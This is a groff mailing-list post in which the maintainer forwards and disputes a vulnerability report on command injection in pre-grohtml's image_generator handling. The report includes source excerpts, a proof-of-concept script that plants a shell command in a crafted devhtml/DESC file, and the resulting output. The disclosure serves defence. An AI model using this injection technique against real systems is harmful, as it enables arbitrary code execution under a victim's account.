At 2026-05-28T22:11:30-0500, G. Branden Robinson wrote:
> By all means, make a stronger case for the threat this suggested
> exploit poses than the reporter did.  I'm not wedded to the spooling
> feature remaining on available in safer mode.  But (1) I don't want to
> pull it behind that gate lacking a _persuasive_ case to do so; and (2)
> I invite the reader to look over groff_font(5) and behold my
> improvements^W^W^W consider similar vectors that other directives
> might make possible.

It took less than two weeks for someone to follow the bread crumbs in
point (2).

I'm inclined to disregard this report, employing the same analysis as
this group applied at the end of last month:

https://lists.gnu.org/archive/html/groff/2026-05/msg00044.html
https://lists.gnu.org/archive/html/groff/2026-05/msg00049.html
https://lists.gnu.org/archive/html/groff/2026-05/msg00051.html

In short, there appears to be no point "hardening" the "print" and
"image_generator" directives such that they are restricted to names of
commands, as the report recommends:

>> **Recommended fix**: Replace the `system()` call with a direct
>> `fork()` + `execvp()` style invocation of the image generator using
>> an `argv` array.  This ensures that the image-generator path and its
>> arguments are passed as separate arguments and cannot be interpreted
>> as shell commands.

...because if an attacker can convince the victim to install a hostile
"DESC" device description file, they can also convince the victim to
install a hostile shell script as well and make it the spooler or image
generator "program", and consequently the recommended fix is no fix at
all.

What do you guys think?  Am I making sense?

Regards,
Branden

----- Forwarded message from wheat MAX <[email protected]> -----

Date: Wed, 10 Jun 2026 13:59:40 +0800
From: wheat MAX <[email protected]>
To: [email protected]
Message-ID: <cakugowdcjxnkpcc+emx7w_x7cczncxaykwqvfow9gpkxv27...@mail.gmail.com>
Subject: [BUG] GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml
 image_generator handling via crafted devhtml/DESC

Hello maintainers, we have discovered a injection bug in the new version of
groff.

# GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml
image_generator handling via crafted devhtml/DESC

## Summary

- **CWE**: CWE-78 (Improper Neutralization of Special Elements used in an
OS Command / OS Command Injection)
- **Vendor**: GNU Project
- **Product**: GNU groff (`pre-grohtml` / `groff -Thtml` pipeline)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU groff 1.24.0)
- **Affected Component(s)**:
  - `src/preproc/html/pre-html.cpp`, `get_image_generator()` — reads the
`image_generator` directive from the `devhtml/DESC` device description
selected through the groff font/device search path.
  - `src/preproc/html/pre-html.cpp`, `imageList::createPage()` — inserts
the `image_generator` string directly into a shell command string.
  - `src/preproc/html/pre-html.cpp`, `html_system()` — executes the
constructed command string with `system()`.
- **Attack Type / Vector**: Local — via a crafted groff font/device
directory supplied with `-F`, containing a malicious `devhtml/DESC`
`image_generator` directive, when `groff -Thtml` processes input that
triggers image generation.
- **Impact**: Arbitrary command execution with the privileges of the user
running `groff -Thtml`.

This report is independent from the companion GNU groff `eqn` CWE-121
report. They affect different groff components and different attack
surfaces: this issue is command injection in the HTML preprocessing
pipeline, while the companion report is a stack-based buffer overflow in
the `eqn` parser.

---

## Technical Details / Root Cause

In GNU groff, the HTML output pipeline uses `pre-grohtml` to prepare input
for HTML formatting and to generate images for content such as equations.
`pre-grohtml` reads device-description files from the groff font/device
search path. The normal `groff -F <font-directory>` option can select an
alternate font/device directory, including an alternate `devhtml/DESC` file.

The vulnerability is in the interaction between the `image_generator`
directive in `devhtml/DESC` and shell command construction in `pre-grohtml`:

1. **Attacker-controlled device directive is read from the selected font
path**: `get_image_generator()` opens `devhtml/DESC` through
`font_path.open_file()`, then returns the text after the `image_generator`
keyword without shell escaping, validation, or restriction:
   ```cpp
   static char *get_image_generator(void)
   {
     char *pathp;
     FILE *f;
     char *generator = 0 /* nullptr */;
     const char keyword[] = "image_generator";
     const size_t keyword_len = strlen(keyword);
     f = font_path.open_file(devhtml_desc, &pathp);
     if (0 /* nullptr */ == f)
       fatal("cannot open file '%1': %2", devhtml_desc, strerror(errno));
     int lineno = 0;
     while (get_line(f, pathp, lineno++)) {
       char *cursor = linebuf;
       size_t limit = strlen(linebuf);
       char *end = linebuf + limit;
       if (0 == (strncmp(linebuf, keyword, keyword_len))) {
         cursor += keyword_len;
         // At least one space or tab is required.
         if(!(' ' == *cursor) || ('\t' == *cursor))
           continue;
         cursor++;
         while((cursor < end) && ((' ' == *cursor) || ('\t' == *cursor)))
           cursor++;
         if (cursor == end)
           continue;
         generator = cursor;
       }
       ...
     }
     free(pathp);
     fclose(f);
     return generator;
   }
   ```

2. **The directive is stored as the global image generator command**:
During startup, `main()` copies the returned string into `image_gen`:
   ```cpp
   image_gen = strsave(get_image_generator());
   if (0 /* nullptr */ == image_gen)
     fatal("'image_generator' directive not found in file '%1'",
           devhtml_desc);
   ```
   At this point, a crafted `devhtml/DESC` can make `image_gen` contain
shell syntax such as `/bin/sh -c 'touch /tmp/marker' #`.

3. **The directive is concatenated into a shell command**: When HTML output
requires image generation, `imageList::createPage()` constructs a command
string and places `image_gen` at the beginning of the command:
   ```cpp
   int imageList::createPage(int pageno)
   {
     ...
     const char *s = make_string("ps2ps -sPageList=%d %s %s",
                                 pageno, psFileName, psPageName);
     html_system(s, 1);
     assert(strlen(image_gen) > 0);
     s = make_string("echo showpage | "
                     "%s%s -q -dBATCH -dSAFER "
                     "-dDEVICEHEIGHTPOINTS=792 "
                     "-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
                     "-sDEVICE=%s -r%d %s "
                     "-sOutputFile=%s %s -",
                     image_gen,
                     EXE_EXT,
                     (getMaxX(pageno) * image_res) / postscriptRes,
                     image_device,
                     image_res,
                     antiAlias,
                     imagePageName,
                     psPageName);
     html_system(s, 1);
     free(const_cast<char *>(s));
     ...
   }
   ```

4. **The constructed string is executed by the shell**: `html_system()`
passes the constructed command string to `system()`:
   ```cpp
   static void html_system(const char *s, int redirect_stdout)
   {
     ...
     int status = system(s);
     ...
   }
   ```
   `system()` invokes `/bin/sh -c`, so shell metacharacters and shell
syntax in `image_generator` are interpreted semantically. A trailing `#` in
the malicious directive comments out the rest of the command appended by
`pre-grohtml`.

No neutralization occurs anywhere on this path. The `image_generator` value
is selected from an attacker-controlled device-description file,
concatenated into a shell command, and executed with `system()`.

---

## Reproduction (PoC)

The command injection is reproducible on the default upstream build of GNU
groff on Linux. The PoC below creates a valid alternate font/device
directory by copying the stock `devhtml` and `devps` device descriptions,
then changes only the `image_generator` directive.

```sh
cd ~/groff_master
rm -rf /tmp/groff_font_cwe78 /tmp/groff_prehtml_cwe78_master
mkdir -p /tmp/groff_font_cwe78/devhtml /tmp/groff_font_cwe78/devps

# Preserve valid device descriptions and modify only image_generator.
cp font/devhtml/DESC /tmp/groff_font_cwe78/devhtml/DESC
cp font/devps/DESC /tmp/groff_font_cwe78/devps/DESC
python3 - <<'PY'
p = '/tmp/groff_font_cwe78/devhtml/DESC'
lines = open(p).read().splitlines()
out = []
for line in lines:
    if line.startswith('image_generator'):
        out.append("image_generator /bin/sh -c 'touch
/tmp/groff_prehtml_cwe78_master' #")
    else:
        out.append(line)
open(p, 'w').write('\n'.join(out) + '\n')
PY

# Use an equation to trigger HTML image generation.
cat > /tmp/eqn_image_cwe78.roff <<'R'
.EQ
a over b
.EN
R

./test-groff -F /tmp/groff_font_cwe78 -e -Thtml /tmp/eqn_image_cwe78.roff \
  >/tmp/groff_html_master.out 2>/tmp/groff_html_master.err

echo "exit=$?"
ls -l /tmp/groff_prehtml_cwe78_master
sed -n '1,8p' /tmp/groff_html_master.err
```

The PoC uses two small files/directories. The relevant modified line in
`/tmp/groff_font_cwe78/devhtml/DESC` is:

```text
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
```

The input document `/tmp/eqn_image_cwe78.roff` is intentionally minimal;
its only purpose is to trigger HTML image generation:

```roff
.EQ
a over b
.EN
```

Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:

```text
GNU groff version 1.24.0
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
master exit=0
MASTER_MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:22 /tmp/groff_prehtml_cwe78_master
pamcut: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmcrop: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pnmtopng: Error reading first byte of what is expected to be a Netpbm magic
number.  Most often, this means your input file is empty
pre-grohtml: command 'pamcut 115 3 9 29 < /tmp/groff-page-0AmDwB | pnmcrop
-quiet| pnmtopng -quiet -background rgb:f/f/f -transparent rgb:f/f/f>
grohtml-2210740-2.png' returned status 1
```

The marker file `/tmp/groff_prehtml_cwe78_master` is created by the command
embedded in `devhtml/DESC`. This confirms semantic command execution in the
stock compiled binary. The later `pamcut`/`pnmcrop` diagnostics occur only
because the PoC replaces the expected Ghostscript program with a
marker-file command; they are not required for command execution.

A final verification run after report formatting used a fresh marker file
and reproduced the same semantic injection:

```text
groff -F malicious -e -Thtml exit=0
MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:29 /tmp/reverify_cwe78_marker
```

---

## Fix / Mitigation

Avoid executing a shell command constructed from a device-description
string. The `image_generator` directive should be treated as an executable
path or command name, not as shell syntax.

**Recommended fix**: Replace the `system()` call with a direct `fork()` +
`execvp()` style invocation of the image generator using an `argv` array.
This ensures that the image-generator path and its arguments are passed as
separate arguments and cannot be interpreted as shell commands.

If configurable arguments are required, parse them with a shell-free
tokenizer and pass each token as a separate `argv` element. Do not pass the
resulting string through `/bin/sh -c`.

### Recommended Mitigations

- **Preferred**: Replace `system()` in the image-generation path with a
shell-free process invocation (`fork()` + `execvp()` or equivalent).
- If patching is not immediately possible:
  - Do not run `groff -Thtml` with untrusted `-F` font/device directories.
  - Do not allow untrusted users to supply `devhtml/DESC` files.
  - Pin groff's font/device path to a trusted directory and sandbox the
formatter when processing untrusted input.

Thank you.

----- End forwarded message -----

Attachment: signature.asc
Description: PGP signature

  • ... G. Branden Robinson
    • ... Sebastien Peterson-Boudreau
    • ... Deri via discussion of the GNU roff typesetting system and related software
      • ... Collin Funk
        • ... G. Branden Robinson
          • ... Larry Kollar
            • ... G. Branden Robinson
              • ... Sebastien Peterson-Boudreau
              • ... G. Branden Robinson
          • ... Collin Funk
          • ... G. Branden Robinson

Reply via email to